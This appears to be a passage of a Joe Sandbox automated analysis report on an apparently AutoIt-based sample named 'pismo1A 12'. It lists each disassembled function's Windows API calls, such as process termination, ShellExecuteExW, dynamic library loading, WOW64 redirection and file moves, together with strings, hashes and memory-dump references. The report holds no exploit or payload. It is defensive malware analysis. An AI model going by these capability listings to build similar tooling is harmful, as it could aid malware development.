Instruction Fuzzy Hash: 560167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5

Function 0070EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0070EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0070EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0070EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB75

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
Instruction ID: 8bf786e4fbad38eb85d5c1aaae50f4a9e83c12f821092a296635f05e7ce339bd
Opcode Fuzzy Hash: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
Instruction Fuzzy Hash: DFF030B2140158BBF72257629C0EEEF3A7CEFCAB12F008158F601E1091D7A85A01D7B9

Function 006F7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 006F7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 006F7469
GetWindowDC.USER32(?), ref: 006F7475
GetPixel.GDI32(00000000,?,?), ref: 006F7484
ReleaseDC.USER32(?,00000000), ref: 006F7496
GetSysColor.USER32(00000005), ref: 006F74B0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
Instruction ID: 70c012f3eb9feda3f0e2cf836e6b2e6fd986735cf87b622e8744347676ddf0ae
Opcode Fuzzy Hash: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
Instruction Fuzzy Hash: C901AD31400219EFEB125F64DC09BFE7BB6FF04312F608060FA15A61A0CB352E51EB14

Function 00701874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0070187F
UnloadUserProfile.USERENV(?,?), ref: 0070188B
CloseHandle.KERNEL32(?), ref: 00701894
CloseHandle.KERNEL32(?), ref: 0070189C
GetProcessHeap.KERNEL32(00000000,?), ref: 007018A5
HeapFree.KERNEL32(00000000), ref: 007018AC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
Instruction ID: d3c80adce5e16e9a0322bcfa890d01e0cf7eeb0a00465979aa4b5a77e75e1a66
Opcode Fuzzy Hash: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
Instruction Fuzzy Hash: 44E0E576004105BBEB025FA1ED0C90ABF39FF49B23B10C220F225A1070CB369830EF58

Function 006ABBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006ABEB3

Strings

D%wD%w, xrefs: 006ABCA5
D%w, xrefs: 006ABCA2
D%w, xrefs: 006ABDED, 006ABD91, 006ABD1B
D%w, xrefs: 006ABE9A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%w$D%w$D%w$D%wD%w
API String ID: 1385522511-1150760593
Opcode ID: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
Instruction ID: 171eaaf57f1521ced85febd8390166c38c22deed87f8689b8383841631dd57de
Opcode Fuzzy Hash: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
Instruction Fuzzy Hash: 63914C75A00206DFCB14EF58C090AA9B7F2FF5A310B24916DD556AB352D731AD82CF90

Function 00727B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

__Init_thread_footer.LIBCMT ref: 00727BFB

Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235

Strings

G, xrefs: 00727C7F
Variable must be of type 'Object'., xrefs: 00727C3A
5, xrefs: 00727C78
+To, xrefs: 00727E2E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +To$5$G$Variable must be of type 'Object'.
API String ID: 535116098-412540982
Opcode ID: c1e6fe184b5f6611169c935845ac16100971b5195a424e2b90c457d719161b8e
Instruction ID: 40178c9c726e4c8ca4eb994ed0fb51c0f9fa0b2c7f3ec668a1757a06926a7026
Opcode Fuzzy Hash: c1e6fe184b5f6611169c935845ac16100971b5195a424e2b90c457d719161b8e
Instruction Fuzzy Hash: 17917F70A04219EFCB18EF54E9959BDB7B6FF45300F14805DF8066B292DB39AE81CB61

Function 0070C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C6EE
_wcslen.LIBCMT ref: 0070C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0070C7CA

Strings

0, xrefs: 0070C6AF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 3bfdb12979347416d7bcfcc7184f2e073dd0d66e914e5d0cba198c2c2dba7310
Instruction ID: 7820d6a2e646ea6415991fb145ae7a66d5132c83163091dc3ff187af5ab368e8
Opcode Fuzzy Hash: 3bfdb12979347416d7bcfcc7184f2e073dd0d66e914e5d0cba198c2c2dba7310
Instruction Fuzzy Hash: ED51BC71604300DBD766EF28C885BAAB7E8AF89310F045B2DF995E21E0DB78DD448F56

Function 0072AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0072AEA3

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

GetProcessId.KERNEL32(00000000), ref: 0072AF38
CloseHandle.KERNEL32(00000000), ref: 0072AF67

Strings

<, xrefs: 0072AE6B
@, xrefs: 0072AE72

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: bf39cad0390709977927824d8659db93df077eaab5a4225fb8b19b2becbe8eff
Instruction ID: 60536b7bf995817a494bf74f97e4aa66fab80b24dd19fc2978218c25dd630080
Opcode Fuzzy Hash: bf39cad0390709977927824d8659db93df077eaab5a4225fb8b19b2becbe8eff
Instruction Fuzzy Hash: B5716771A00625EFCB14EF54D485A9EBBF1AF09310F04849DE816AB362CB78ED45CFA5

Function 0070719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00707206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0070723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0070724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007072CF

Strings

DllGetClassObject, xrefs: 00707242

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
Instruction ID: fba563419474f10ae057220c04f6edb552a2372aafa8174d1ea3a99032f48fe7
Opcode Fuzzy Hash: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
Instruction Fuzzy Hash: 864151B1A04204EFDB19CF54C884A9A7BF9FF44310F1581A9BD059F24AD7B9ED44DBA0

Function 00732F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00732F8D
LoadLibraryW.KERNEL32(?), ref: 00732F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00732FA9
DestroyWindow.USER32(?), ref: 00732FB1

Strings

SysAnimate32, xrefs: 00732F68

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
Instruction ID: d68285b74e5203ae3847372c975ce7955e514ff714c914ad8fac11b654596c25
Opcode Fuzzy Hash: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
Instruction Fuzzy Hash: 9B21FD7220420AEBFB114F64DC80EBB37BDEF59364F104618FA50E21A2C339DC829760

Function 006C4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002), ref: 006C4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000), ref: 006C4DC3

Strings

CorExitProcess, xrefs: 006C4D98
mscoree.dll, xrefs: 006C4D86

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
Instruction ID: 83a1d1d50c2a522f2ce0be0a7e5ecd7ba251543857385f302e4f9411459d12f7
Opcode Fuzzy Hash: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
Instruction Fuzzy Hash: 03F04475540208BBEB129F90DC49FEDBBB5EF44752F044198F906A2250DF786940DBD5

Function 006FD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 006FD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006FD3BF
FreeLibrary.KERNEL32(00000000), ref: 006FD3E5

Strings

GetSystemWow64DirectoryW, xrefs: 006FD3B9
X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
Instruction ID: a913967dcc7a8e19b7a329be56d54fff654d5304aefd151cabd2ac70e356b050
Opcode Fuzzy Hash: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
Instruction Fuzzy Hash: B9F055B640563C9BFB3227108C089B93213AF12B02B54C098FB02F2218DB24EE80A7C7

Function 006A4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 006A4EA8
kernel32.dll, xrefs: 006A4E94

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
Instruction ID: 6b1e6d01cc86676f33fbe6fa705ce319ab007768e2a098b542b079bc4f2b7f83
Opcode Fuzzy Hash: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
Instruction Fuzzy Hash: EFE08676A016225BA22327256C18A9B6555BFC2B63B054115FC01F2201DFA8CD0196E4

Function 006A4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87

Strings

kernel32.dll, xrefs: 006A4E5B
Wow64RevertWow64FsRedirection, xrefs: 006A4E6E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
Instruction ID: 5a6d64405b41d679a75cc6029d02460d2e030c3039db735b29123e927845af2f
Opcode Fuzzy Hash: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
Instruction Fuzzy Hash: 4AD0C2765026215766232B247C08DCB6A1ABFC2B123054111B801F2211CFA8CD01DAD4

Function 0072A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0072A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0072A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0072A468
CloseHandle.KERNEL32(?), ref: 0072A63D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
Instruction ID: a862be1d36c622c0ab4b2b6cd439ffda68f1790071efa43b77eba30b483644f5
Opcode Fuzzy Hash: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
Instruction Fuzzy Hash: 6AA1B171604300AFE760EF24D886F2AB7E6AF84714F14881DF55A9B2D2D774EC41CB96

Function 006DBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
_free.LIBCMT ref: 006DBB7F

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DBD4B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
Instruction ID: b4577477c33abf5e2e906f2703304a461f3e604bf567b8219e9ce02c5a864dc0
Opcode Fuzzy Hash: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
Instruction Fuzzy Hash: 35510471D00209EBCB10EF698C819AEB7BAFF44350B12526FE454D7399EB709E409B58

Function 0070E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

lstrcmpiW.KERNEL32(?,?), ref: 0070E473
MoveFileW.KERNEL32(?,?), ref: 0070E4AC
_wcslen.LIBCMT ref: 0070E5EB
_wcslen.LIBCMT ref: 0070E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0070E650

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
